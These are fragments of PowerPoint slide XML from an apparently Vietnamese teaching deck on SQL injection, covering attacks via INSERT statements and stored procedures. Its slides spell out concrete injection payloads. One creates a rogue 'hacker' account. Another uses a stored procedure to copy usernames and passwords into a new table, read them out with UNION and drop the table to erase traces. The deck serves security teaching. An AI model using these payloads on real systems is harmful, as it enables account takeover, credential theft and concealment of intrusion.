                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>SQL injection có thể được dùng khi hệ thống không kiểm tra tính hợp lý của thông tin người dùng nhập </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>vào.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Cơ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>chế: Kích thích cho hệ quản trị phát sinh thông báo lỗi mang theo cả thông tin về CSDL. Có thể sử dụng một số lỗi cú pháp thông thường như </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>sau:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Tìm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>tên bảng, tên </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>cột</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Định </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>kiểu của từng </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>trường</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: ’; insert into tblUser(tkUser, tkPass) values(‘hacker’, ‘123456’) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Hacker có thể đăng nhập vào hệ thống thông qua tài khoản vừa tạo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="947614" y="250653"/>
            <a:ext cx="7262798" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1800" b="1" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Tấn công dựa vào lệnh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1800" b="1" i="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>INSERT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" i="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4118112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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="486"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="486"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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685801" y="610080"/>
            <a:ext cx="7736364" cy="4426740"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Nếu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>đoạn mã xây dựng câu lệnh SQL có dạng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRP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endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Thì </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>chắc chắn sẽ bị lỗi SQL Injection, bởi vì nếu ta nhập vào trường thứ nhất ví dụ như: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>+ (SELECT TOP 1 FieldName FROM TableName) + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>'.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Lúc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>này câu truy vấn sẽ là: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>INSERT INTO TableName VALUES(' ' + (SELECT TOP 1 FieldName FROM TableName) + ' ', 'abc', 'def')</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Khi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>đó, lúc thực hiện lệnh xem thông tin, xem như ta đã yêu cầu thực hiện thêm một lệnh nữa đó là: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>SELECT TOP 1 FieldName FROM TableName</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="947614" y="215211"/>
            <a:ext cx="7262798" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1800" b="1" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Tấn công dựa vào lệnh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1800" b="1" i="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>INSERT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" i="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Graphical user interface, text&#10;&#10;Description automatically generated"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect t="1544" b="2716"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4775412" y="695424"/>
            <a:ext cx="3752629" cy="1663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11616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735863" y="610081"/>
            <a:ext cx="7686301" cy="471959"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Ví dụ lấy thông tin trong bảng </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>TAIKHOAN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="947614" y="215211"/>
            <a:ext cx="7262798" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Tấn </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>công sử dụng stored-procedures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Text&#10;&#10;Description automatically generated with low confidence"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2199350" y="1157287"/>
            <a:ext cx="4759325" cy="1122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735861" y="584543"/>
            <a:ext cx="7686301" cy="4185761"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="just" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>Bước 1:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>Tạo một Stored procedure để chép vào tất cả thông tin của 2 trường </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" i="1" dirty="0"/>
              <a:t>TenDangNhap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>và </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" i="1" dirty="0"/>
              <a:t>MatKhau </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>trong bảng TAIKHOAN thành một chuỗi vào một bảng mới là </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" i="1" dirty="0"/>
              <a:t>atbm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>có một trường là ret: Thực thi câu lệnh bằng cách nhập vào form</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0"/>
              <a:t>Username: ‘; Create proc test as begin declare @ret varchar(8000) set @ret=‘:’ select @ret=@ret + '’ + TenDangNhap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0"/>
              <a:t>+ ‘/’ + MatKhau from TAIKHOAN select @ret as ret into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>atbm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="just" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>Bước 2: Gọi Stored procedure đó: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0"/>
              <a:t>Username:’; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>exec test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>Kết quả tạo ra một table mới trên CSDL có tên atbm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="just" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>Bước 3: Dùng UNION để xem nội dung bảng </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>atbm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0"/>
              <a:t>Username:’;select ret,1 from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>atbm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0"/>
              <a:t> union select 1,1 from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>atbm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>Hacker có nội dung gồm có tên TenDangNhap và mật khẩu MatKhau</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="just" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>Bước 4: xoá bảng foo để xoá dấu vết: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0"/>
              <a:t>Username: ‘; drop table </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>atbm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0"/>
              <a:t>—</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
